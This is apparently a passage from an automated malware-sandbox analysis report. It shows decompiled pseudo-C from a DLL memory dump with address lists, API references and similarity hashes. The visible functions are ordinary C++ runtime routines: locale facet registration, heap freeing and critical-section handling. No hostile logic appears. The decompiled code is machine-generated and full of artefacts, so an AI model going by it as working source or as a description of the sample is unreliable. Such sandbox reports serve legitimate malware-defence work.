																_t492 = E6E162171( *((intOrPtr*)(_t529 + 8)), E6E161F29(_t368, 0x6e2216b0, _t491, _t506));
																__eflags = _t492;
																if(_t492 != 0) {
																	L33:
																	E6E18F30C(_t529 - 0x14);
																	return E6E1A9D88(_t492);
																} else {
																	__eflags = _t506;
																	if(_t506 == 0) {
																		_push( *((intOrPtr*)(_t529 + 8)));
																		_push(_t529 - 0x10);
																		__eflags = E6E19AF00(_t368, _t492, _t506) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E161CB5(__eflags);
																			asm("int3");
																			E6E1A9DBF(0x6e1ec3ec, _t368, _t492, _t506, 8);
																			E6E18F2A5(_t529 - 0x14, 0);
																			_t507 =  *0x6e221710; // 0x0
																			 *(_t529 - 4) =  *(_t529 - 4) & 0x00000000;
																			 *(_t529 - 0x10) = _t507;
																			_t493 = E6E162171( *((intOrPtr*)(_t529 + 8)), E6E161F29(_t368, 0x6e2216bc, _t492, _t507));
																			__eflags = _t493;
																			if(_t493 != 0) {
																				L40:
																				E6E18F30C(_t529 - 0x14);
																				return E6E1A9D88(_t493);
																			} else {
																				__eflags = _t507;
																				if(_t507 == 0) {
																					_push( *((intOrPtr*)(_t529 + 8)));
																					_push(_t529 - 0x10);
																					__eflags = E6E19AF85(_t368, _t493, _t507) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E161CB5(__eflags);
																						asm("int3");
																						E6E1A9DBF(0x6e1ec3ec, _t368, _t493, _t507, 8);
																						E6E18F2A5(_t529 - 0x14, 0);
																						_t508 =  *0x6e2216e8; // 0x0
																						 *(_t529 - 4) =  *(_t529 - 4) & 0x00000000;
																						 *(_t529 - 0x10) = _t508;
																						_t494 = E6E162171( *((intOrPtr*)(_t529 + 8)), E6E161F29(_t368, 0x6e22169c, _t493, _t508));
																						__eflags = _t494;
																						if(_t494 != 0) {
																							L47:
																							E6E18F30C(_t529 - 0x14);
																							return E6E1A9D88(_t494);
																						} else {
																							__eflags = _t508;
																							if(_t508 == 0) {
																								_push( *((intOrPtr*)(_t529 + 8)));
																								_push(_t529 - 0x10);
																								__eflags = E6E19AFED(_t368, _t494, _t508) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E161CB5(__eflags);
																									asm("int3");
																									E6E1A9DBF(0x6e1ec3ec, _t368, _t494, _t508, 8);
																									E6E18F2A5(_t529 - 0x14, 0);
																									_t509 =  *0x6e221714; // 0x0
																									 *(_t529 - 4) =  *(_t529 - 4) & 0x00000000;
																									 *(_t529 - 0x10) = _t509;
																									_t495 = E6E162171( *((intOrPtr*)(_t529 + 8)), E6E161F29(_t368, 0x6e2216c0, _t494, _t509));
																									__eflags = _t495;
																									if(_t495 != 0) {
																										L54:
																										E6E18F30C(_t529 - 0x14);
																										return E6E1A9D88(_t495);
																									} else {
																										__eflags = _t509;
																										if(_t509 == 0) {
																											_push( *((intOrPtr*)(_t529 + 8)));
																											_push(_t529 - 0x10);
																											__eflags = E6E19B055(_t368, _t495, _t509) - 0xffffffff;
																											if(__eflags == 0) {
																												E6E161CB5(__eflags);
																												asm("int3");
																												E6E1A9DBF(0x6e1ec3ec, _t368, _t495, _t509, 8);
																												E6E18F2A5(_t529 - 0x14, 0);
																												_t510 =  *0x6e221718; // 0x0
																												 *(_t529 - 4) =  *(_t529 - 4) & 0x00000000;
																												 *(_t529 - 0x10) = _t510;
																												_t496 = E6E162171( *((intOrPtr*)(_t529 + 8)), E6E161F29(_t368, 0x6e2216c4, _t495, _t510));
																												__eflags = _t496;
																												if(_t496 != 0) {
																													L61:
																													E6E18F30C(_t529 - 0x14);
																													return E6E1A9D88(_t496);
																												} else {
																													__eflags = _t510;
																													if(_t510 == 0) {
																														_push( *((intOrPtr*)(_t529 + 8)));
																														_push(_t529 - 0x10);
																														__eflags = E6E19B0BD(_t368, _t496, _t510) - 0xffffffff;
																														if(__eflags == 0) {
																															E6E161CB5(__eflags);
																															asm("int3");
																															E6E1A9DBF(0x6e1ec3ec, _t368, _t496, _t510, 8);
																															E6E18F2A5(_t529 - 0x14, 0);
																															_t511 =  *0x6e221734; // 0x0
																															 *(_t529 - 4) =  *(_t529 - 4) & 0x00000000;
																															 *(_t529 - 0x10) = _t511;
																															_t497 = E6E162171( *((intOrPtr*)(_t529 + 8)), E6E161F29(_t368, 0x6e2216e0, _t496, _t511));
																															__eflags = _t497;
																															if(_t497 != 0) {
																																L68:
																																E6E18F30C(_t529 - 0x14);
																																return E6E1A9D88(_t497);
																															} else {
																																__eflags = _t511;
																																if(_t511 == 0) {
																																	_push( *((intOrPtr*)(_t529 + 8)));
																																	_push(_t529 - 0x10);
																																	__eflags = E6E19B138(_t368, _t497, _t511) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6E161CB5(__eflags);
																																		asm("int3");
																																		E6E1A9DBF(0x6e1ec3ec, _t368, _t497, _t511, 8);
																																		E6E18F2A5(_t529 - 0x14, 0);
																																		_t512 =  *0x6e221704; // 0x0
																																		 *(_t529 - 4) =  *(_t529 - 4) & 0x00000000;
																																		 *(_t529 - 0x10) = _t512;
																																		_t498 = E6E162171( *((intOrPtr*)(_t529 + 8)), E6E161F29(_t368, 0x6e2216b8, _t497, _t512));
																																		__eflags = _t498;
																																		if(_t498 != 0) {
																																			L75:
																																			E6E18F30C(_t529 - 0x14);
																																			return E6E1A9D88(_t498);
																																		} else {
																																			__eflags = _t512;
																																			if(_t512 == 0) {
																																				_push( *((intOrPtr*)(_t529 + 8)));
																																				_push(_t529 - 0x10);
																																				__eflags = E6E19B1A4(_t368, _t498, _t512) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6E161CB5(__eflags);
																																					asm("int3");
																																					E6E1A9DBF(0x6e1ec3ec, _t368, _t498, _t512, 8);
																																					E6E18F2A5(_t529 - 0x14, 0);
																																					_t513 =  *0x6e221738; // 0x0
																																					 *(_t529 - 4) =  *(_t529 - 4) & 0x00000000;
																																					 *(_t529 - 0x10) = _t513;
																																					_t499 = E6E162171( *((intOrPtr*)(_t529 + 8)), E6E161F29(_t368, 0x6e2216e4, _t498, _t513));
																																					__eflags = _t499;
																																					if(_t499 != 0) {
																																						L82:
																																						E6E18F30C(_t529 - 0x14);
																																						return E6E1A9D88(_t499);
																																					} else {
																																						__eflags = _t513;
																																						if(_t513 == 0) {
																																							_push( *((intOrPtr*)(_t529 + 8)));
																																							_push(_t529 - 0x10);
																																							__eflags = E6E19B210(_t368, _t499, _t513) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6E161CB5(__eflags);
																																								asm("int3");
																																								E6E1A9DBF(0x6e1ec3ec, _t368, _t499, _t513, 8);
																																								E6E18F2A5(_t529 - 0x14, 0);
																																								_t514 =  *0x6e221708; // 0x0
																																								 *(_t529 - 4) =  *(_t529 - 4) & 0x00000000;
																																								 *(_t529 - 0x10) = _t514;
																																								_t500 = E6E162171( *((intOrPtr*)(_t529 + 8)), E6E161F29(_t368, 0x6e221698, _t499, _t514));
																																								__eflags = _t500;
																																								if(_t500 != 0) {
																																									L89:
																																									E6E18F30C(_t529 - 0x14);
																																									return E6E1A9D88(_t500);
																																								} else {
																																									__eflags = _t514;
																																									if(_t514 == 0) {
																																										_push( *((intOrPtr*)(_t529 + 8)));
																																										_push(_t529 - 0x10);
																																										_t307 = E6E19B284(_t368, _t500, _t514);
																																										_pop(_t446);
																																										__eflags = _t307 - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6E161CB5(__eflags);
																																											asm("int3");
																																											E6E1A9DBF(0x6e1ecb1a, _t368, _t500, _t514, 4);
																																											_t515 = _t446;
																																											 *(_t529 - 0x10) = _t515;
																																											 *((intOrPtr*)(_t515 + 4)) =  *((intOrPtr*)(_t529 + 0xc));
																																											_push( *((intOrPtr*)(_t529 + 0x14)));
																																											_t163 = _t529 - 4;
																																											 *_t163 =  *(_t529 - 4) & 0x00000000;
																																											__eflags =  *_t163;
																																											 *_t515 = 0x6e1f225c;
																																											 *((char*)(_t515 + 0x28)) =  *((intOrPtr*)(_t529 + 0x10));
																																											E6E19F3D8(_t368, _t446, _t486, _t500, _t515,  *_t163);
																																											return E6E1A9D88(_t515,  *((intOrPtr*)(_t529 + 8)));
																																										} else {
																																											_t500 =  *(_t529 - 0x10);
																																											 *(_t529 - 0x10) = _t500;
																																											 *(_t529 - 4) = 1;
																																											E6E1911C1(__eflags, _t500);
																																											 *0x6e1ee1b4();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t500 + 4))))();
																																											 *0x6e221708 = _t500;
																																											goto L89;
																																										}
																																									} else {
																																										_t500 = _t514;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t499 =  *(_t529 - 0x10);
																																								 *(_t529 - 0x10) = _t499;
																																								 *(_t529 - 4) = 1;
																																								E6E1911C1(__eflags, _t499);
																																								 *0x6e1ee1b4();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t499 + 4))))();
																																								 *0x6e221738 = _t499;
																																								goto L82;
																																							}
																																						} else {
																																							_t499 = _t513;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t498 =  *(_t529 - 0x10);
																																					 *(_t529 - 0x10) = _t498;
																																					 *(_t529 - 4) = 1;
																																					E6E1911C1(__eflags, _t498);
																																					 *0x6e1ee1b4();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t498 + 4))))();
																																					 *0x6e221704 = _t498;
																																					goto L75;
																																				}
																																			} else {
																																				_t498 = _t512;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t497 =  *(_t529 - 0x10);
																																		 *(_t529 - 0x10) = _t497;
																																		 *(_t529 - 4) = 1;
																																		E6E1911C1(__eflags, _t497);
																																		 *0x6e1ee1b4();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t497 + 4))))();
																																		 *0x6e221734 = _t497;
																																		goto L68;
																																	}
																																} else {
																																	_t497 = _t511;
																																	goto L68;
																																}
																															}
																														} else {
																															_t496 =  *(_t529 - 0x10);
																															 *(_t529 - 0x10) = _t496;
																															 *(_t529 - 4) = 1;
																															E6E1911C1(__eflags, _t496);
																															 *0x6e1ee1b4();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t496 + 4))))();
																															 *0x6e221718 = _t496;
																															goto L61;
																														}
																													} else {
																														_t496 = _t510;
																														goto L61;
																													}
																												}
																											} else {
																												_t495 =  *(_t529 - 0x10);
																												 *(_t529 - 0x10) = _t495;
																												 *(_t529 - 4) = 1;
																												E6E1911C1(__eflags, _t495);
																												 *0x6e1ee1b4();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t495 + 4))))();
																												 *0x6e221714 = _t495;
																												goto L54;
																											}
																										} else {
																											_t495 = _t509;
																											goto L54;
																										}
																									}
																								} else {
																									_t494 =  *(_t529 - 0x10);
																									 *(_t529 - 0x10) = _t494;
																									 *(_t529 - 4) = 1;
																									E6E1911C1(__eflags, _t494);
																									 *0x6e1ee1b4();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t494 + 4))))();
																									 *0x6e2216e8 = _t494;
																									goto L47;
																								}
																							} else {
																								_t494 = _t508;
																								goto L47;
																							}
																						}
																					} else {
																						_t493 =  *(_t529 - 0x10);
																						 *(_t529 - 0x10) = _t493;
																						 *(_t529 - 4) = 1;
																						E6E1911C1(__eflags, _t493);
																						 *0x6e1ee1b4();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t493 + 4))))();
																						 *0x6e221710 = _t493;
																						goto L40;
																					}
																				} else {
																					_t493 = _t507;
																					goto L40;
																				}
																			}
																		} else {
																			_t492 =  *(_t529 - 0x10);
																			 *(_t529 - 0x10) = _t492;
																			 *(_t529 - 4) = 1;
																			E6E1911C1(__eflags, _t492);
																			 *0x6e1ee1b4();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t492 + 4))))();
																			 *0x6e2216fc = _t492;
																			goto L33;
																		}
																	} else {
																		_t492 = _t506;
																		goto L33;
																	}
																}
															} else {
																_t491 =  *(_t529 - 0x10);
																 *(_t529 - 0x10) = _t491;
																 *(_t529 - 4) = 1;
																E6E1911C1(__eflags, _t491);
																 *0x6e1ee1b4();
																 *((intOrPtr*)( *((intOrPtr*)( *_t491 + 4))))();
																 *0x6e221700 = _t491;
																goto L26;
															}
														} else {
															_t491 = _t505;
															goto L26;
														}
													}
												} else {
													_t490 =  *(_t529 - 0x10);
													 *(_t529 - 0x10) = _t490;
													 *(_t529 - 4) = 1;
													E6E1911C1(__eflags, _t490);
													 *0x6e1ee1b4();
													 *((intOrPtr*)( *((intOrPtr*)( *_t490 + 4))))();
													 *0x6e22172c = _t490;
													goto L19;
												}
											} else {
												_t490 = _t504;
												goto L19;
											}
										}
									} else {
										_t489 =  *(_t529 - 0x10);
										 *(_t529 - 0x10) = _t489;
										 *(_t529 - 4) = 1;
										E6E1911C1(__eflags, _t489);
										 *0x6e1ee1b4();
										 *((intOrPtr*)( *((intOrPtr*)( *_t489 + 4))))();
										 *0x6e221730 = _t489;
										goto L12;
									}
								} else {
									_t489 = _t503;
									goto L12;
								}
							}
						} else {
							_t488 =  *(_t529 - 0x10);
							 *(_t529 - 0x10) = _t488;
							 *(_t529 - 4) = 1;
							E6E1911C1(__eflags, _t488);
							 *0x6e1ee1b4();
							 *((intOrPtr*)( *((intOrPtr*)( *_t488 + 4))))();
							 *0x6e2216f8 = _t488;
							goto L5;
						}
					} else {
						_t488 = _t502;
						goto L5;
					}
				}
			}

0x6e1991b5
0x6e1991bc
0x6e1991c6
0x6e1991cb
0x6e1991d6
0x6e1991da
0x6e1991e6
0x6e1991eb
0x6e1991ef
0x6e199234
0x6e199237
0x6e199243
0x6e1991f1
0x6e1991f3
0x6e1991f9
0x6e1991ff
0x6e199207
0x6e19920a
0x6e199244
0x6e199249
0x6e199251
0x6e19925b
0x6e199260
0x6e19926b
0x6e19926f
0x6e199280
0x6e199282
0x6e199284
0x6e1992c9
0x6e1992cc
0x6e1992d8
0x6e199286
0x6e199286
0x6e199288
0x6e19928e
0x6e199294
0x6e19929c
0x6e19929f
0x6e1992d9
0x6e1992de
0x6e1992e6
0x6e1992f0
0x6e1992f5
0x6e199300
0x6e199304
0x6e199315
0x6e199317
0x6e199319
0x6e19935e
0x6e199361
0x6e19936d
0x6e19931b
0x6e19931b
0x6e19931d
0x6e199323
0x6e199329
0x6e199331
0x6e199334
0x6e19936e
0x6e199373
0x6e19937b
0x6e199385
0x6e19938a
0x6e199395
0x6e199399
0x6e1993aa
0x6e1993ac
0x6e1993ae
0x6e1993f3
0x6e1993f6
0x6e199402
0x6e1993b0
0x6e1993b0
0x6e1993b2
0x6e1993b8
0x6e1993be
0x6e1993c6
0x6e1993c9
0x6e199403
0x6e199408
0x6e199410
0x6e19941a
0x6e19941f
0x6e19942a
0x6e19942e
0x6e19943f
0x6e199441
0x6e199443
0x6e199488
0x6e19948b
0x6e199497
0x6e199445
0x6e199445
0x6e199447
0x6e19944d
0x6e199453
0x6e19945b
0x6e19945e
0x6e199498
0x6e19949d
0x6e1994a5
0x6e1994af
0x6e1994b4
0x6e1994bf
0x6e1994c3
0x6e1994d4
0x6e1994d6
0x6e1994d8
0x6e19951d
0x6e199520
0x6e19952c
0x6e1994da
0x6e1994da
0x6e1994dc
0x6e1994e2
0x6e1994e8
0x6e1994f0
0x6e1994f3
0x6e19952d
0x6e199532
0x6e19953a
0x6e199544
0x6e199549
0x6e199554
0x6e199558
0x6e199569
0x6e19956b
0x6e19956d
0x6e1995b2
0x6e1995b5
0x6e1995c1
0x6e19956f
0x6e19956f
0x6e199571
0x6e199577
0x6e19957d
0x6e199585
0x6e199588
0x6e1995c2
0x6e1995c7
0x6e1995cf
0x6e1995d9
0x6e1995de
0x6e1995e9
0x6e1995ed
0x6e1995fe
0x6e199600
0x6e199602
0x6e199647
0x6e19964a
0x6e199656
0x6e199604
0x6e199604
0x6e199606
0x6e19960c
0x6e199612
0x6e19961a
0x6e19961d
0x6e199657
0x6e19965c
0x6e199664
0x6e19966e
0x6e199673
0x6e19967e
0x6e199682
0x6e199693
0x6e199695
0x6e199697
0x6e1996dc
0x6e1996df
0x6e1996eb
0x6e199699
0x6e199699
0x6e19969b
0x6e1996a1
0x6e1996a7
0x6e1996af
0x6e1996b2
0x6e1996ec
0x6e1996f1
0x6e1996f9
0x6e199703
0x6e199708
0x6e199713
0x6e199717
0x6e199728
0x6e19972a
0x6e19972c
0x6e199771
0x6e199774
0x6e199780
0x6e19972e
0x6e19972e
0x6e199730
0x6e199736
0x6e19973c
0x6e199744
0x6e199747
0x6e199781
0x6e199786
0x6e19978e
0x6e199798
0x6e19979d
0x6e1997a8
0x6e1997ac
0x6e1997bd
0x6e1997bf
0x6e1997c1
0x6e199806
0x6e199809
0x6e199815
0x6e1997c3
0x6e1997c3
0x6e1997c5
0x6e1997cb
0x6e1997d1
0x6e1997d9
0x6e1997dc
0x6e199816
0x6e19981b
0x6e199823
0x6e19982d
0x6e199832
0x6e19983d
0x6e199841
0x6e199852
0x6e199854
0x6e199856
0x6e19989b
0x6e19989e
0x6e1998aa
0x6e199858
0x6e199858
0x6e19985a
0x6e199860
0x6e199866
0x6e19986e
0x6e199871
0x6e1998ab
0x6e1998b0
0x6e1998b8
0x6e1998c2
0x6e1998c7
0x6e1998d2
0x6e1998d6
0x6e1998e7
0x6e1998e9
0x6e1998eb
0x6e199930
0x6e199933
0x6e19993f
0x6e1998ed
0x6e1998ed
0x6e1998ef
0x6e1998f5
0x6e1998fb
0x6e1998fc
0x6e199902
0x6e199903
0x6e199906
0x6e199940
0x6e199945
0x6e19994d
0x6e199952
0x6e199954
0x6e19995a
0x6e19995d
0x6e199966
0x6e199966
0x6e199966
0x6e19996a
0x6e199970
0x6e199973
0x6e19997f
0x6e199908
0x6e199908
0x6e19990b
0x6e19990f
0x6e199913
0x6e199920
0x6e199928
0x6e19992a
0x00000000
0x6e19992a
0x6e1998f1
0x6e1998f1
0x00000000
0x6e1998f1
0x6e1998ef
0x6e199873
0x6e199873
0x6e199876
0x6e19987a
0x6e19987e
0x6e19988b
0x6e199893
0x6e199895
0x00000000
0x6e199895
0x6e19985c
0x6e19985c
0x00000000
0x6e19985c
0x6e19985a
0x6e1997de
0x6e1997de
0x6e1997e1
0x6e1997e5
0x6e1997e9
0x6e1997f6
0x6e1997fe
0x6e199800
0x00000000
0x6e199800
0x6e1997c7
0x6e1997c7
0x00000000
0x6e1997c7
0x6e1997c5
0x6e199749
0x6e199749
0x6e19974c
0x6e199750
0x6e199754
0x6e199761
0x6e199769
0x6e19976b
0x00000000
0x6e19976b
0x6e199732
0x6e199732
0x00000000
0x6e199732
0x6e199730
0x6e1996b4
0x6e1996b4
0x6e1996b7
0x6e1996bb
0x6e1996bf
0x6e1996cc
0x6e1996d4
0x6e1996d6
0x00000000
0x6e1996d6
0x6e19969d
0x6e19969d
0x00000000
0x6e19969d
0x6e19969b
0x6e19961f
0x6e19961f
0x6e199622
0x6e199626
0x6e19962a
0x6e199637
0x6e19963f
0x6e199641
0x00000000
0x6e199641
0x6e199608
0x6e199608
0x00000000
0x6e199608
0x6e199606
0x6e19958a
0x6e19958a
0x6e19958d
0x6e199591
0x6e199595
0x6e1995a2
0x6e1995aa
0x6e1995ac
0x00000000
0x6e1995ac
0x6e199573
0x6e199573
0x00000000
0x6e199573
0x6e199571
0x6e1994f5
0x6e1994f5
0x6e1994f8
0x6e1994fc
0x6e199500
0x6e19950d
0x6e199515
0x6e199517
0x00000000
0x6e199517
0x6e1994de
0x6e1994de
0x00000000
0x6e1994de
0x6e1994dc
0x6e199460
0x6e199460
0x6e199463
0x6e199467
0x6e19946b
0x6e199478
0x6e199480
0x6e199482
0x00000000
0x6e199482
0x6e199449
0x6e199449
0x00000000
0x6e199449
0x6e199447
0x6e1993cb
0x6e1993cb
0x6e1993ce
0x6e1993d2
0x6e1993d6
0x6e1993e3
0x6e1993eb
0x6e1993ed
0x00000000
0x6e1993ed
0x6e1993b4
0x6e1993b4
0x00000000
0x6e1993b4
0x6e1993b2
0x6e199336
0x6e199336
0x6e199339
0x6e19933d
0x6e199341
0x6e19934e
0x6e199356
0x6e199358
0x00000000
0x6e199358
0x6e19931f
0x6e19931f
0x00000000
0x6e19931f
0x6e19931d
0x6e1992a1
0x6e1992a1
0x6e1992a4
0x6e1992a8
0x6e1992ac
0x6e1992b9
0x6e1992c1
0x6e1992c3
0x00000000
0x6e1992c3
0x6e19928a
0x6e19928a
0x00000000
0x6e19928a
0x6e199288
0x6e19920c
0x6e19920c
0x6e19920f
0x6e199213
0x6e199217
0x6e199224
0x6e19922c
0x6e19922e
0x00000000
0x6e19922e
0x6e1991f5
0x6e1991f5
0x00000000
0x6e1991f5
0x6e1991f3

APIs

__EH_prolog3.LIBCMT ref: 6E1991BC
std::_Lockit::_Lockit.LIBCPMT ref: 6E1991C6

Part of subcall function 6E161F29: __EH_prolog3.LIBCMT ref: 6E161F30
Part of subcall function 6E161F29: std::_Lockit::_Lockit.LIBCPMT ref: 6E161F41
Part of subcall function 6E161F29: std::_Lockit::~_Lockit.LIBCPMT ref: 6E161F61

std::_Facet_Register.LIBCPMT ref: 6E199217
std::_Lockit::~_Lockit.LIBCPMT ref: 6E199237
Concurrency::cancel_current_task.LIBCPMT ref: 6E199244

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$H_prolog3Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 3920336645-0
Opcode ID: 3af6df18908e2c2d76a4eeb1dcdb9600daa0173c6835effa8d0a0b87d025b30e
Instruction ID: d6b66b6adfb652e5ce4050366fa8e97829aad5162ff4ed65cdec3f9817120acf
Opcode Fuzzy Hash: 3af6df18908e2c2d76a4eeb1dcdb9600daa0173c6835effa8d0a0b87d025b30e
Instruction Fuzzy Hash: EB01C43590011A9FCF05DBE4C864AFD77B9AF84714F254859E821AB280CF3099C8FB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DDD12, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E1DDD12(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x6e218070; // 0x6e2180c4
					if(_t23 != 0) {
						E6E1D1BE4(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x6e218074; // 0x6e221bb8
					if(_t24 != 0) {
						E6E1D1BE4(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x6e218078; // 0x6e221bb8
					if(_t25 != 0) {
						E6E1D1BE4(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x6e2180a0; // 0x6e2180c8
					if(_t26 != 0) {
						E6E1D1BE4(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x6e2180a4; // 0x6e221bbc
					if(_t27 != 0) {
						return E6E1D1BE4(_t6);
					}
				}
				return _t6;
			}

0x6e1ddd18
0x6e1ddd1d
0x6e1ddd21
0x6e1ddd27
0x6e1ddd2a
0x6e1ddd2f
0x6e1ddd33
0x6e1ddd39
0x6e1ddd3c
0x6e1ddd41
0x6e1ddd45
0x6e1ddd4b
0x6e1ddd4e
0x6e1ddd53
0x6e1ddd57
0x6e1ddd5d
0x6e1ddd60
0x6e1ddd65
0x6e1ddd66
0x6e1ddd69
0x6e1ddd6f
0x00000000
0x6e1ddd77
0x6e1ddd6f
0x6e1ddd7a

APIs

_free.LIBCMT ref: 6E1DDD2A

Part of subcall function 6E1D1BE4: HeapFree.KERNEL32(00000000,00000000,?,6E1DDFED,?,00000000,?,?,?,6E1DE2F1,?,00000007,?,?,6E1DD69F,?), ref: 6E1D1BFA
Part of subcall function 6E1D1BE4: GetLastError.KERNEL32(?,?,6E1DDFED,?,00000000,?,?,?,6E1DE2F1,?,00000007,?,?,6E1DD69F,?,?), ref: 6E1D1C0C

_free.LIBCMT ref: 6E1DDD3C
_free.LIBCMT ref: 6E1DDD4E
_free.LIBCMT ref: 6E1DDD60
_free.LIBCMT ref: 6E1DDD72

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: a5016a7b707c7ab49c3ac2f3d77b55fd9802da13418db9205f5e2773b296e195
Instruction ID: 9496aee8cb1fd4ab3e44c68319b0141d2c9896f2e2630b6e60353b4c28a19e52
Opcode Fuzzy Hash: a5016a7b707c7ab49c3ac2f3d77b55fd9802da13418db9205f5e2773b296e195
Instruction Fuzzy Hash: 2BF06232608E099B8E54CAE4E4C5DDA33EEBA113103750D0AF158D7940DB30F9C8DEA4

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A94E9, Relevance: 7.5, APIs: 5, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E6E1A94E9(intOrPtr* _a4) {
				intOrPtr _t7;
				intOrPtr _t12;
				intOrPtr _t13;
				signed int _t14;
				void* _t17;
				void* _t19;
				intOrPtr* _t20;

				EnterCriticalSection(0x6e221780);
				_t12 =  *0x6e218010; // 0x80000000
				_t13 = _t12 + 1;
				 *0x6e218010 = _t13;
				 *_a4 = _t13;
				_t14 =  *0x6e221af0; // 0x9
				_t7 =  *0x6e218010; // 0x80000000
				 *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t14 * 4)) + 4)) = _t7;
				LeaveCriticalSection(0x6e221780);
				_t19 = _t17;
				_push(_t19);
				_t20 =  *0x6e22179c;
				if(_t20 == 0) {
					SetEvent( *0x6e22177c);
					return ResetEvent( *0x6e22177c);
				} else {
					 *0x6e1ee1b4(0x6e221778);
					return  *_t20();
				}
			}

0x6e1a94f3
0x6e1a94f9
0x6e1a9502
0x6e1a9503
0x6e1a950a
0x6e1a9512
0x6e1a951b
0x6e1a9520
0x6e1a9526
0x6e1a952c
0x6e1a9591
0x6e1a9592
0x6e1a959a
0x6e1a95b3
0x6e1a95c6
0x6e1a959c
0x6e1a95a3
0x6e1a95ac
0x6e1a95ac

APIs

EnterCriticalSection.KERNEL32(6E221780,?,?,6E17DFBE,6E1ED65D,6E238BE4,6E238BE4,000000E4), ref: 6E1A94F3
LeaveCriticalSection.KERNEL32(6E221780,?,?,6E17DFBE,6E1ED65D,6E238BE4,6E238BE4,000000E4), ref: 6E1A9526
RtlWakeAllConditionVariable.NTDLL ref: 6E1A95A9
SetEvent.KERNEL32(?,6E17DFBE,6E1ED65D,6E238BE4,6E238BE4,000000E4), ref: 6E1A95B3
ResetEvent.KERNEL32(?,6E17DFBE,6E1ED65D,6E238BE4,6E238BE4,000000E4), ref: 6E1A95BF

Memory Dump Source

Source File: 00000008.00000002.509181469.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000008.00000002.508679119.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512353242.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.512735896.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512744170.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.512769256.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.512781560.000000006E222000.00000040.00020000.sdmp Download File
Associated: 00000008.00000002.512804977.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
String ID:
API String ID: 3916383385-0
Opcode ID: 0a42dec16883af29ed4a13aebac0a8bf67ce07d19d13a32cbbdfb4fe330d5f11
Instruction ID: 92807caec88f0a435818cd6f74084ff084b2d57f0e033d55b07a5356e8aed6e0
Opcode Fuzzy Hash: 0a42dec16883af29ed4a13aebac0a8bf67ce07d19d13a32cbbdfb4fe330d5f11
Instruction Fuzzy Hash: 64016D75600A24DFCF04AF98E98DEE837A6FB4B351701806AF60187700CB725A81EFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1899C9, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E6E1899C9(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t78;
				void* _t83;
				signed int _t87;
				signed int _t89;
				void* _t91;
				signed int _t102;
				void* _t104;
				intOrPtr _t112;
				intOrPtr _t113;
				void* _t114;
